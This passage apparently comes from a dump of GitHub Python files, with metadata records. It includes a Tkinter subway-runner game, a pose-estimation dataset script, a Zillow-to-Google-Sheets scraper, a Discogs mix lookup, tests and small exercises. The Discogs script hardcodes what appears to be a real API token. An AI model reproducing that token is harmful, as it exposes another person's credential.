getting hit by a train! The game will become faster and faster.\nPick up power ups (a purple '?') and reveal its mystery!\nThe trains will strategically become more difficult to surpass.\nCollect coins in-game and level up your power ups in the shop! \nTry beating current NPC scores or beat your own!\"\"\"\n buttonCenter = (self.cx, self.cy)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = theText, font = f\"Constantia 20\")\n\n buttonCenter = (self.cx, self.cy*1.8)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toPlay)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button1))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"BEGIN!\", font = f\"Constantia 40\")\n\n\n\n\n elif self.currentMode == \"help\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n buttonCenter = (self.cx, self.cy/6)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"INSTRUCTIONS\", font = f\"Constantia 60\")\n theText = \"\"\"Use the arrow keys or WASD to navigate through the subways.\\nJump using up arrow/w and Duck using down arrow/s!\\nAvoid getting hit by a train! The game will become faster and faster.\\nThe trains will strategically become more difficult to surpass.\\nCollect coins in-game and level up your power ups in the shop! \\nTry beating current NPC scores or beat your own!\\n\\nAI power up auto-runs the game for you!\\nDouble Points doubles your multiplier!\\nSpeedy Boots speeds up the game with a force field!\\nMagnet auto-grabs coins and makes them worth more!\"\"\"\n buttonCenter = (self.cx, self.cy)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = theText, font = f\"Constantia 20\")\n\n buttonCenter = (self.cx, self.cy*1.8)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toHome)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button1))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"HOME\", font = f\"Constantia 40\")\n\n\n\n\n elif self.currentMode == \"end\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n buttonCenter = (self.cx, self.cy/6)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"CONGRATULATIONS!\", font = f\"Constantia 60\")\n\n buttonCenter = (self.cx, self.cy/2)\n canvas.create_text(buttonCenter[0], buttonCenter[1], text = f\"SCORE: {self.score}\", font = f\"Constantia 50\", fill = \"gray\")\n canvas.create_text(buttonCenter[0], buttonCenter[1]+50, text = f\"PERSONAL BEST: {self.personalHighest}\", font = f\"Constantia 30\", fill = \"pink\")\n buttonCenter = (self.cx, self.cy)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = f\"COINS: {self.coinsCollected}\", font = f\"Constantia 50\")\n canvas.create_text(buttonCenter[0], buttonCenter[1]+43, text = f\"TOTAL COINS: {getCurrency()}\", font = f\"Constantia 30\", fill = \"pink\")\n\n buttonCenter = (self.cx/2, self.cy*1.4)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toPlay)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button1))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"RESTART\", font = f\"Constantia 40\")\n\n buttonCenter = (self.cx*1.5, self.cy*1.6)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toShop)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button2))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"SHOP\", font = f\"Constantia 40\")\n\n buttonCenter = (self.cx/2, self.cy*1.8)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toScores)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button3))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"SCORES\", font = f\"Constantia 40\")\n\n\n\n\n elif self.currentMode == \"scores\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n buttonCenter = (self.cx, self.cy/6)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"HIGH SCORES!\", font = f\"Constantia 60\")\n buttonCenter = (self.cx, self.cy/2)\n\n canvas.create_rectangle(self.cx/4, self.cy/2.5, self.cx* (7/4), self.cy * (4.75/3), fill = \"seashell3\", width = 4)\n scores = listTopNScores(10)\n for i, content in enumerate(scores.split('\\n')):\n canvas.create_text(buttonCenter[0], buttonCenter[1] + (i*50), text = content, font = f\"Constantia 30\")\n\n buttonCenter = (self.cx, self.cy*1.85)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toHome)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button3))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"HOME\", font = f\"Constantia 40\")\n\n\n\n\n elif self.currentMode == \"shop\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n buttonCenter = (self.cx, self.cy/6)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"ANT'S SHOP\", font = f\"Constantia 60\")\n canvas.create_text(buttonCenter[0], buttonCenter[1]+80, text = f\"COINS: {getCurrency()}\", fill = \"gold\", font = f\"Constantia 30\")\n\n buttonCenter = (self.cx/3, self.cy*(2.5/4))\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.upgradeSpeedyBoots)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.speedyBootsImage))\n level = (getUpgrade(\"SPEEDY BOOTS\")-10000)//2000\n cost = int(getUpgrade(\"SPEEDY BOOTS\")/75)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + 675, buttonCenter[1] + 20, fill = \"seashell3\", width = 4, onClick = self.upgradeSpeedyBoots)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + (675-150)/6 * level + 150, buttonCenter[1] + 20, width = 4, fill = \"limegreen\", onClick = self.upgradeSpeedyBoots)\n if level == 6:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"MAXED\", font = f\"Constantia 20\") \n else:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"UPGRADE TO LVL {level} FOR {cost} COINS\", font = f\"Constantia 20\")\n duration = getUpgrade(\"SPEEDY BOOTS\")//1000\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1]-45, text = f\"DURATION: {duration} SECONDS\", font = f\"Constantia 15\") \n\n\n\n buttonCenter = (self.cx/3, self.cy*(3.75/4))\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.upgradeDoublePoints)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.multiplierImage))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"\", font = f\"Constantia 40\")\n level = (getUpgrade(\"DOUBLE POINTS\")-10000)//2000\n cost = int(getUpgrade(\"DOUBLE POINTS\")/75)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + 675, buttonCenter[1] + 20, fill = \"seashell3\", width = 4, onClick = self.upgradeDoublePoints)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + (675-150)/6 * level + 150, buttonCenter[1] + 20, width = 4, fill = \"limegreen\", onClick = self.upgradeDoublePoints)\n if level == 6:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"MAXED\", font = f\"Constantia 20\") \n else:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"UPGRADE TO LVL {level} FOR {cost} COINS\", font = f\"Constantia 20\")\n duration = getUpgrade(\"DOUBLE POINTS\")//1000\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1]-45, text = f\"DURATION: {duration} SECONDS\", font = f\"Constantia 15\") \n\n\n\n buttonCenter = (self.cx/3, self.cy*(5/4))\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.upgradeMagnet)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.magnetImage))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"\", font = f\"Constantia 40\") \n level = (getUpgrade(\"MAGNET\")-10000)//2000\n cost = int(getUpgrade(\"MAGNET\")/75)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + 675, buttonCenter[1] + 20, fill = \"seashell3\", width = 4, onClick = self.upgradeMagnet)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + (675-150)/6 * level + 150, buttonCenter[1] + 20, width = 4, fill = \"limegreen\", onClick = self.upgradeMagnet)\n if level == 6:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"MAXED\", font = f\"Constantia 20\") \n else:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"UPGRADE TO LVL {level} FOR {cost} COINS\", font = f\"Constantia 20\")\n duration = getUpgrade(\"MAGNET\")//1000\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1]-45, text = f\"DURATION: {duration} SECONDS\", font = f\"Constantia 15\") \n\n buttonCenter = (self.cx/3, self.cy*(6.25/4))\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.upgradeAI)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.AIImage))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"\", font = f\"Constantia 40\") \n level = (getUpgrade(\"AI\")-10000)//2000\n cost = int(getUpgrade(\"AI\")/75)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + 675, buttonCenter[1] + 20, fill = \"seashell3\", width = 4, onClick = self.upgradeAI)\n canvas.create_rectangle(buttonCenter[0] + 150, buttonCenter[1] - 20, buttonCenter[0] + (675-150)/6 * level + 150, buttonCenter[1] + 20, width = 4, fill = \"limegreen\", onClick = self.upgradeAI)\n if level == 6:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"MAXED\", font = f\"Constantia 20\") \n else:\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1], text = f\"UPGRADE TO LVL {level} FOR {cost} COINS\", font = f\"Constantia 20\")\n duration = getUpgrade(\"MAGNET\")//1000\n canvas.create_text(buttonCenter[0]+400, buttonCenter[1]-45, text = f\"DURATION: {duration} SECONDS\", font = f\"Constantia 15\") \n\n buttonCenter = (self.cx, self.cy*1.86)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toHome)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button3))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"HOME\", font = f\"Constantia 40\") \n\n\n\n\n elif self.currentMode == \"play\":\n canvas.create_line(0,self.focus[1],self.width, self.focus[1])\n canvas.create_line(self.focus[0], 0, self.focus[0], self.width)\n\n\n canvas.create_rectangle(0, self.focus[1] - self.cameraPos[1], self.width, self.height, fill = \"skyblue4\", outline = \"\")\n if self.map == \"MALIBU\":\n canvas.create_rectangle(0,0,self.width, self.focus[1] - self.cameraPos[1], fill = \"plum1\", outline = \"\")\n else:\n canvas.create_rectangle(0,0,self.width, self.focus[1] - self.cameraPos[1], fill = \"skyblue\", outline = \"\")\n lanes, rails = self.createLanesAndRails()\n\n for lanes in lanes:\n lanes.render(canvas)\n\n for rails in rails:\n rails.render(canvas)\n\n for plank in self.planks:\n plank.render(canvas)\n\n\n for coin in self.coins:\n coin.render(canvas)\n\n renderOrder = [] #think reverse because what's rendered last is up front\n if self.runner.currentLane == 0:\n renderOrder = [4,3, 2,1,-2,-1,0]\n elif self.runner.currentLane == 1:\n renderOrder = [4,-2,3,-1,2,0,1]\n else:\n renderOrder = [-2,-1,0,4,1,3,2]\n\n newOrder = []\n \n for v in renderOrder:\n for obj in self.objects:\n if obj.lane == v:\n newOrder += [obj]\n\n for obj in newOrder:\n obj.render(canvas)\n\n self.runner.render(canvas)\n\n #display score\n textSize = self.height/40\n canvas.create_rectangle(0,0,self.width,45, fill = \"black\", outline = \"\")\n canvas.create_rectangle(0,self.height-45,self.width,self.height, fill = \"black\", outline = \"\")\n\n canvas.create_text(self.width/2, self.height-textSize, text = f\"MAP: {self.map}\", font = f\"Arial {int(textSize)}\", fill = \"grey\")\n\n canvas.create_text(self.width/2, textSize, text = f\"{self.score}\", font = f\"Arial {int(textSize)}\", fill = \"white\")\n\n #display coins\n canvas.create_text(self.width*.75, textSize, text = f\"COINS: {self.coinsCollected}\", font = f\"Arial {int(textSize)}\", fill = \"yellow\")\n displayMult = self.multiplier\n\n if self.runner.currentPowerUp == \"DOUBLE POINTS\":\n displayMult *= 2\n\n canvas.create_text(self.width*.25, textSize, text = f\"x{displayMult}\", font = f\"Arial {int(textSize)}\", fill = \"cyan\")\n\n #display powerup\n if self.runner.currentPowerUp != None and self.runner.powerUpTimeLeft > 0:\n canvas.create_rectangle(0,45,self.width,70, fill = \"black\", outline = \"\")\n canvas.create_rectangle(0,45,self.width*(self.runner.powerUpTimeLeft/getUpgrade(self.runner.currentPowerUp)),65, fill = \"lime green\", outline = \"\")\n canvas.create_text(self.width/2, 55, text = f\"{self.runner.currentPowerUp}\", font = f\"Arial {15}\", fill = \"white\")\n\n\n if self.transitioning == True:\n inc = math.sin(.5*math.pi*(self.transitionFrame/self.transitionFrames))*self.height/2\n canvas.create_rectangle(0,0,self.width, inc, fill = \"black\")\n canvas.create_rectangle(0,self.height-inc,self.width, self.height, fill = \"black\")\n\n\nMetroMastersApp(width = 900, height = 900)\n","repo_name":"antoineassaf25/Metro-Masters","sub_path":"metro/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":57287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40441515823","text":"import torch\nfrom types import SimpleNamespace\nfrom tqdm import tqdm\nimport numpy as np\n\n\ndef unpack_train_data(data, dataset, target_key, config):\n '''\n Unpack sample from dataloader & move to GPU\n '''\n if dataset == 'MPii':\n inps = data['pose_input']\n labels = {}\n labels['img_center'] = data['img_center']\n labels[target_key] = data['gt_pose']\n bboxes = data['bbox']\n img_ids = data['img_id'] #torch.ones(len(bboxes)) * -9 # dummy\n img_paths = data['img_path']\n else:\n (inps, labels, img_ids, bboxes) = data\n img_paths = torch.ones(len(bboxes)) * -9 # dummy\n\n if isinstance(inps, list):\n inps = [inp.to(config.device) for inp in inps]\n else:\n inps=inps.to(config.device)\n\n for k, _ in labels.items():\n try:\n labels[k] = labels[k].to(config.device)\n except AttributeError:\n if k == 'img_path': continue\n else: assert k == 'type'\n \n return inps, labels, img_ids, img_paths, bboxes\n\ndef convert_kpts_to_h36m_17s(target_xyzs, dataset, task='train'):\n '''\n Convert joint labels to H36M 17 joints\n '''\n if dataset == 'PW3D':\n return target_xyzs\n elif dataset == 'HP3D':\n if task == 'train':\n EVAL_JOINTS_17 = [\n 4, \n 18, 19, 20, \n 23, 24, 25,\n 3, 5, # 'spine' == spine_extra, 'neck' == throat (not quite 'neck_extra' as desired)\n 6, 7, # \n 9, 10, 11,\n 14, 15, 16,\n ]\n else:\n EVAL_JOINTS_17 = [\n 14, \n 11, 12, 13,\n 8, 9, 10,\n 15, 1, \n 16, 0,\n 5, 6, 7,\n 2, 3, 4,\n ]\n target_xyzs = np.vstack(target_xyzs)\n # target_xyzs = [t.reshape(-1, 3)[EVAL_JOINTS_17].reshape(1,-1) for t in target_xyzs]\n target_xyzs = target_xyzs.reshape(target_xyzs.shape[0], -1 ,3)[:,EVAL_JOINTS_17]\n return target_xyzs.reshape(1, target_xyzs.shape[0], -1)\n if dataset == 'MPii':\n EVAL_JOINTS_17 = [\n 0,\n 1, 4, 7, # LL\n 2, 5, 8, # RL\n 6, 12, # torso, neck\n 15, 15, # (theres no head top unfortunately)\n 16, 18, 20, # LA\n 17, 19, 21, # RA\n ] \n target_xyzs = [np.take(t.reshape(-1, t.shape[1], 3), EVAL_JOINTS_17, axis=1) for t in target_xyzs]\n target_xyzs = [t.reshape(-1, 51) for t in target_xyzs]\n return target_xyzs\n\n\ndef create_cnet_dataset_w_HybrIK(m, config, gt_dataset, dataset, task='train'):\n # Data/Setup\n gt_loader = torch.utils.data.DataLoader(gt_dataset, batch_size=64, shuffle=False, \n num_workers=2, drop_last=False, pin_memory=True)\n m.eval()\n m = m.to(config.device)\n\n opt = SimpleNamespace()\n opt.device = config.device\n opt.flip_test = True\n\n target_keys = {\n 'HP3D': 'target_xyz',\n 'PW3D': 'target_xyz_17',\n 'MPii': 'gt_pose',\n }\n target_key = target_keys[dataset]\n\n backbone_preds, target_xyzs, img_idss, img_pathss = [], [], [], []\n for i, data in enumerate(tqdm(gt_loader, dynamic_ncols=True)):\n inps, labels, img_ids, img_paths, bboxes = unpack_train_data(data, dataset, target_key, opt)\n\n m_output = m(inps, flip_test=opt.flip_test, bboxes=bboxes.to(config.device), img_center=labels['img_center'])\n backbone_pred = m_output.pred_xyz_jts_17\n\n backbone_preds.append(backbone_pred)\n target_xyzs.append(labels[target_key])\n img_idss.append(img_ids)\n # img_pathss.append(img_paths)\n\n # if i > 16: break\n\n print(\"Detaching & reformatting...\")\n backbone_preds = [b.detach().cpu().numpy() for b in backbone_preds]\n backbone_preds = np.concatenate(backbone_preds, axis=0)\n target_xyzs = [t.detach().cpu().numpy() for t in target_xyzs]\n target_xyz_17s = convert_kpts_to_h36m_17s(target_xyzs, dataset, task=task)\n target_xyz_17s = np.concatenate(target_xyz_17s, axis=0)\n\n img_idss = np.concatenate([i.detach().cpu().numpy() for i in img_idss], axis=0).reshape(-1,1)\n\n # img_names = []\n # for batch in img_pathss:\n # for img_path in batch:\n # img_name = img_path.split('/')[-1]\n # img_name = img_name.split('.')[0]\n # img_names.append(int(img_name))\n # # img_paths = np.concatenate([int(p.split('/')[-1].split('.')[0]) for p in img_paths], axis=0).reshape(-1,1)\n # img_pathss = np.array(img_names).reshape(-1,1)\n\n # Fix scale of MPii pseudo-GT by normalize target magnitude to match the backbone preds\n if dataset == 'MPii':\n scale_pred = np.linalg.norm(backbone_preds, keepdims=True)\n scale_gt = np.linalg.norm(target_xyz_17s, keepdims=True)\n target_xyz_17s /= (scale_gt / scale_pred)\n\n if task == 'train':\n dataset_outpath = '{}{}/{}_cnet_hybrik_train.npy'.format(config.cnet_dataset_path, dataset, config.hybrIK_version,)\n elif task == 'test':\n dataset_outpath = '{}{}/{}_cnet_hybrik_test.npy'.format(config.cnet_dataset_path, dataset, config.hybrIK_version,)\n print(\"Saving HybrIK pred dataset to {}\".format(dataset_outpath))\n np.save(dataset_outpath, np.array([backbone_preds,\n target_xyz_17s,\n np.repeat(img_idss, backbone_pred.shape[1], axis=1),]))\n # np.repeat(img_pathss, backbone_pred.shape[1], axis=1)]))\n return\n","repo_name":"lbidulka/ESCAPE","sub_path":"core/cnet_data.py","file_name":"cnet_data.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4487500219","text":"#!/usr/bin/python3\nTOKEN=\"RokNHxieRWZySdOCslYJgbJCLGLOtZnVYNIZChsi\"\n\nimport discogs_client\nfrom mixes_extract_mixdb import mixesdb_extractor\nimport slskd_api\n\n\nd = discogs_client.Client('download_mix_files/1.0', user_token=TOKEN)\n\nltracks = mixesdb_extractor.get_list(\"Laurent Garnier\",5)\ntrack = ltracks[5]\nrelease = d.search(track['artist'] + \" - \" + track['title'])[0]\nprint()\nprint('*****')\nprint(track)\nprint()\nprint(release.title)\n\n# for track in ltracks:\n# if(track):\n# try:\n# release = d.search(track['artist'] + \" - \" + track['title'])[0]\n# print()\n# print('*****')\n# print(track)\n# print()\n# print(release.title)\n# except:\n# pass","repo_name":"mounjichahed/download_mix_files","sub_path":"download_mix_files.py","file_name":"download_mix_files.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16861457333","text":"import gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport requests\nfrom datetime import datetime\nscope = [\"https://spreadsheets.google.com/feeds\",'https://www.googleapis.com/auth/spreadsheets',\"https://www.googleapis.com/auth/drive.file\",\"https://www.googleapis.com/auth/drive\"]\n\ncreds = ServiceAccountCredentials.from_json_keyfile_name(\"creds.json\", scope)\n\nclient = gspread.authorize(creds)\n\n\nsheet = client.open(\"zillow stats capture\")\n # Open the spreadhseet\n\nsheet1 = sheet.sheet1\ncol = sheet1.col_values(1) # Get a specific column\n \nsession = requests.session()\ntest = pd.DataFrame(columns=['House Link','Timestamp','Time on Zillow','Views','Saves'])\ndef get_data(soup):\n time = soup.find(text=\"Time on Zillow\").parent.next_element.next_element.text\n views = soup.find(text=\"Views\").next_element.text\n saves = soup.find(text=\"Saves\").next_element.text\n return(time,views,saves)\n\ncol.remove(\"House Link\")\nfor house in col:\n burp0_headers = {\"Sec-Ch-Ua\": \"\\\"Chromium\\\";v=\\\"91\\\", \\\" Not;A Brand\\\";v=\\\"99\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\n data = session.get(house, headers=burp0_headers)\n soup = BeautifulSoup(data.text, 'html.parser')\n\n time, views, saves = get_data(soup)\n now = datetime.now()\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n data = {\"House Link\": house,\"Timestamp\": dt_string,\"Time on Zillow\": time, 'Views': views, 'Saves': saves}\n test = test.append(data, ignore_index=True)\n #print(f\"Time on Zillow: {house_data[0]}\\nViews: {house_data[1]}\\nSaves: {house_data[2]}\")\n\nsheet1.update([test.columns.values.tolist()] + test.values.tolist())","repo_name":"Ranger11Danger/random_webscrapers","sub_path":"zillow2gsheets.py","file_name":"zillow2gsheets.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7483759487","text":"import unittest\nimport main\nimport tkinter as tk\nimport os\nimport csv\nimport json\n\n\nclass TestCTI(unittest.TestCase):\n\n def setUp(self):\n self.app = main.window\n\n def tearDown(self):\n self.app.update()\n self.app.destroy()\n\n def test_window_title(self):\n self.assertEqual(self.app.title(), \"Select Profile\")\n\n def test_window_size(self):\n self.assertEqual(self.app.geometry(), \"550x350\")\n\n def test_label_text(self):\n label = self.app.children['!label']\n self.assertEqual(label.cget('text'), \"Welcome to ThreatLink Intelligence\")\n\n def test_buttons_exist(self):\n button_frame = self.app.children['!frame']\n analyst_button = button_frame.children['!button']\n management_button = button_frame.children['!button2']\n csirt_button = button_frame.children['!button3']\n\n self.assertIsNotNone(analyst_button)\n self.assertIsNotNone(management_button)\n self.assertIsNotNone(csirt_button)\n\n def test_button_text(self):\n button_frame = self.app.children['!frame']\n analyst_button = button_frame.children['!button']\n management_button = button_frame.children['!button2']\n csirt_button = button_frame.children['!button3']\n\n self.assertEqual(analyst_button.cget('text'), \"Analyst\")\n self.assertEqual(management_button.cget('text'), \"Management\")\n self.assertEqual(csirt_button.cget('text'), \"CSIRT\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"rayhaan1/ThreatLinkIntelligence","sub_path":"IntegrationTests.py","file_name":"IntegrationTests.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4060400846","text":"# 7569 토마토\r\nimport sys\r\nfrom collections import deque\r\n\r\ninput = sys.stdin.readline\r\n\r\ndx = [-1,1,0,0,0,0]\r\ndy = [0,0,-1,1,0,0]\r\ndz = [0,0,0,0,-1,1]\r\n\r\nM, N, H = map(int, input().split(\" \"))\r\ngraph = []\r\ntemp = []\r\ntomato = []\r\n# M은 가로 칸, N은 새로 칸, H는 높이\r\n\r\nfor z in range(H):\r\n for y in range(N):\r\n temp2 = list(map(int, input().split(\" \")))\r\n for i in range(M):\r\n if temp2[i] == 0:\r\n temp2[i] = -2\r\n elif temp2[i] == 1:\r\n temp2[i] = 0\r\n tomato.append([i,y,z])\r\n temp.append(temp2)\r\n graph.append(temp)\r\n temp = []\r\n \r\n#print(graph)\r\n#print(tomato)\r\n\r\ndef bfs(x,y,z):\r\n q = deque([[x,y,z]])\r\n graph[z][y][x] = 0\r\n\r\n while q:\r\n x1, y1, z1 = q.popleft()\r\n # print(x1, y1, z1)\r\n\r\n for i in range(6):\r\n nx = x1 + dx[i]\r\n ny = y1 + dy[i]\r\n nz = z1 + dz[i]\r\n\r\n if nx < 0 or ny < 0 or nz < 0 or nx > M-1 or ny > N-1 or nz > H-1:\r\n continue\r\n\r\n if graph[nz][ny][nx] == -1:\r\n continue\r\n \r\n \r\n if graph[nz][ny][nx] < 0 or graph[z1][y1][x1] + 1 < graph[nz][ny][nx]:\r\n graph[nz][ny][nx] = graph[z1][y1][x1] + 1\r\n q.append([nx, ny, nz])\r\n \r\n\r\n# z, y, x 순서대로 좌표.. ㄷㄷ \r\n\r\nfor x,y,z, in tomato:\r\n #print(x,y,z)\r\n bfs(x,y,z)\r\n\r\n#print(graph)\r\ncurMax = 0\r\nfinal = 0\r\n\r\n\r\nfor z in range(H):\r\n for y in range(N):\r\n if -2 in graph[z][y]:\r\n final = -1\r\n else:\r\n curMax = max(curMax, max(graph[z][y]))\r\n\r\nif final == -1:\r\n print(-1)\r\nelse:\r\n print(curMax)","repo_name":"SongDerrick/BOJ_PS","sub_path":"백준/Gold/7569. 토마토/토마토.py","file_name":"토마토.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"2961503567","text":"from PyQt6.QtWidgets import QApplication, QMainWindow, QWidget,QLineEdit,QLabel,QVBoxLayout,QPushButton, QMessageBox\r\n\r\nclass Wwindow5(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n \r\n layout = QVBoxLayout()\r\n self.login_lbl = QLabel(\"Вы успешно прошли тест\")\r\n \r\n self.exit_btn = QPushButton(\"завершить\")\r\n \r\n \r\n layout.addWidget(self.login_lbl)\r\n layout.addWidget(self.exit_btn)\r\n \r\n \r\n self.exit_btn.clicked.connect(self.exit)\r\n \r\n widget = QWidget()\r\n widget.setLayout(layout)\r\n self.setCentralWidget(widget)\r\n \r\n \r\n \r\n def exit(self):\r\n exe.close() \r\n \r\n with open(\"style.css\", \"r\") as css:\r\n widget.setStyleSheet(css.read())","repo_name":"Evgen792/prog","sub_path":"window5.py","file_name":"window5.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17893887401","text":"'''\nRuns unit tests for various SPy spatial functions.\n\nTo run the unit tests, type the following from the system command line:\n\n # python -m spectral.tests.spatial\n'''\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport numpy as np\nfrom numpy.testing import assert_allclose\nfrom warnings import warn\n\nimport spectral as spy\nfrom spectral.algorithms.spatial import (get_window_bounds,\n get_window_bounds_clipped,\n map_class_ids, map_classes,\n map_window)\nfrom spectral.tests.spytest import SpyTest\n\n\nclass SpatialWindowTest(SpyTest):\n '''Tests various spatial functions.'''\n\n def setup(self):\n self.data = spy.open_image('92AV3C.lan').load()\n\n def test_get_window_bounds(self):\n assert(get_window_bounds(90, 90, 3, 7, 30, 40) == (29, 32, 37, 44))\n\n def test_get_window_bounds_border(self):\n assert(get_window_bounds(90, 90, 3, 7, 0, 2) == (0, 3, 0, 7))\n\n def test_get_window_bounds_clipped(self):\n assert(get_window_bounds_clipped(90, 90, 3, 7, 30, 40) \\\n == (29, 32, 37, 44))\n\n def test_get_window_bounds_clipped_border(self):\n assert(get_window_bounds_clipped(90, 90, 3, 7, 0, 2) == (0, 2, 0, 6))\n\n def test_map_window(self):\n '''Test computing spectra average over local window.'''\n f = lambda X, ij: np.mean(X.reshape((-1, X.shape[-1])), axis=0)\n X = self.data\n y = 